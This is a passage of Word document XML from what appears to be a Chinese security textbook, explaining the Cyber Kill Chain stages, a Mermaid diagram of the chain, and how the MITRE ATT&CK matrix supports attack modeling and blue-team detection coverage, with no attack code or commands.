        <w:t xml:space="preserve">CVE-2017-11882）结合。本节不涉及武器化构建细节，仅在此标注其在攻击链中的位置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">投递（Delivery）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者将武器化载体传输至目标环境。常见的投递途径包括钓鱼邮件附件、受感染网站的水坑攻击链接、向目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> USB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">存储设备置入恶意文件，或利用边界暴露的服务端口直接上传载荷。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">利用（Exploitation）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：恶意载体在目标系统上触发漏洞，执行攻击者预设的代码。触发可能发生在用户点击恶意链接后浏览器渲染引擎的解析过程、打开</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Office </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文档时宏的执行，或一个未认证的远程服务接收到畸形数据包时。利用成功后的代码执行通常仅获得与受攻击进程同等的有限权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">安装（Installation）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者植入持久化载荷。在利用阶段获得初始执行权后，攻击者迅速安装一个能够长期驻留并重启后自启的后门程序。这一步通常涉及将恶意可执行文件写入磁盘、创建计划任务、修改注册表</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">键或劫持系统服务等操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">命令与控制（Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and Control, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">C2）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者建立对被控主机的远程控制信道。持久化载荷安装后，会发起一条由内向外的连接（通常使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP/HTTPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隧道以混入正常流量）与攻击者的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器建立链路，使攻击者能够发送指令并接收被窃取的数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">目标行动（Actions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Objectives）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者执行其最终目标。根据攻击动机的不同，这可能是窃取敏感文件（数据渗漏）、加密文件系统并索要赎金、篡改网站页面、破坏关键基础设施，或利用被控主机作为跳板，向更深层的内网目标进行横向移动，开始新一轮杀伤链循环。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">下图使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mermaid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">描绘了这一链式流程：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flowchart LR</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">A[侦察]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">B[武器化]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> B --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">C[投递]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> C --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">D[利用]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> D --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">E[安装]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> E --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">F[命令与控制&lt;br&gt;C2]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> F --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">G[目标行动]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> G --&gt; A</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此流程图清晰地展示了攻击的逻辑递进关系。从侦察到目标行动的弧形箭头则揭示了一个关键事实：一次攻击行动的目标行动阶段往往触发对新的目标或更深层网络的侦察，从而开启新一轮迭代式杀伤链。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络杀伤链提供了一种直观的应急响应思路：防御者只要在任何一环阻断攻击者的流程，就能瓦解整个攻击。然而，其线性特征也构成了主要局限性：它难以精准映射当前攻击者在目标内部完成初始突破后，依赖凭据窃取、横向移动与权限提升等“内网漫步”阶段的行为，这些行为往往包含多个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通道的变化与杀伤链的反复循环，而非严格的线性顺序。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为了弥补线性模型的不足，MITRE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架应运而生（标②具体技术编号随版本更新）。ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并不是杀伤链的替代品，而是一个基于真实世界观测的“敌手行为知识库”，其核心结构是一个二维矩阵：纵轴是战术（Tactics），即敌手执行一项行动“为什么”（The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“why”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）；横轴是针对该战术的一系列技术（Techniques），即敌手“怎么做”（The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“how”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以最具代表性的企业矩阵（Enterprise</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Matrix）为例，它的战术列从左至右概括了一个攻击生命周期的宏观阶段，其粗粒度类似于杀伤链，但含义更丰富：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">侦察</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">资源开发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">初始访问</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">持久化</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限提升</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御规避</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">凭据访问</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">横向移动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">收集</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令与控制</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">渗漏</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">影响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。一个显著的区别在于，杀伤链的“安装”在这里被扩展为包含“持久化”、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“权限提升”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“防御规避”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等多个更为清晰的、敌手在内网阶段所追求的不同“战术目标”；而“发现”与“横向移动”等战术，精准捕获了杀伤链模型未能充分体现的内网扫描与跳板行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在每一战术列之下，是一系列具体的技术。例如，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">持久化（Persistence）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">战术下，可能包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">计划任务（Scheduled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Task）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">登录自启项（Registry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Run Keys / Startup </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Folder）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务创建（Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Service）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等技术。每一个技术还可以展开，列出其已知的子技术。每个技术/子技术页包含对行为的详细描述、流程示例、缓解措施与检测方法，以及映射到该技术的真实攻击组织和软件工具。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">于是，ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">矩阵为本书后续各章提供了一个精确的坐标系。当我们讲解一个具体的攻击手法时——例如，如何在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vsftpd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后门获取初始访问、然后通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NFS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置错误提升权限——我们将分别映射到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">初始访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">战术下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">利用面向公众的应用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">技术，以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限提升</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">战术下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">利用提权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">技术。这一做法把零散的攻击实操案例统一到了全球安全社区的通用知识结构中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">接下来，必须厘清两个框架的关系与各自的用途，这是本书贯穿始终并呼应卷五蓝队理念的核心准则。杀伤链与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并非竞争关系，而是互补的分析维度，分别服务于攻击建模与检测映射两种不同的任务。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">杀伤链适用于顶层的攻击建模（Attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Modeling）与应急响应回放。当一个组织的安全运营中心（SOC）在事后调查中尝试重建入侵事件的时间线和攻击者的路径时，杀伤链是一个优秀的高层叙事模型。它回答的问题是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“入侵者是如何一步步打进来的？我们是在哪个阶段检测到他的？”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则适用于底层的检测映射（Detection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Mapping）与防御覆盖度评估。蓝队可以利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">矩阵来编排其检测工程的优先级。一个成熟的蓝队会遍历</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">矩阵中的每一项技术，并标记：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“对于此技术，我们目前使用何种数据源（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sysmon </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志、网络流量分析）来检测？我们当前部署的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EDR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">策略是否具有可见性？”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这被称为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">导航层（Navigator）的覆盖度评估。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">交叉回指框</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：本书的结构设计严格遵循“攻防对称”原则。卷一奠定方法论基石；卷二至卷四将从红队视角出发，依次讲解侦察、Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">渗透、系统与后渗透技术，每章均会明确标注其所处的杀伤链阶段与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">战术/技术位置。而卷五将回归蓝队视角，展示如何基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架对卷二至卷四所展示的攻击技术进行检测规则编写与日志分析。也就是说，读者在卷二学到的每一个攻击技术，都将作为卷五蓝队检测的“靶子”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
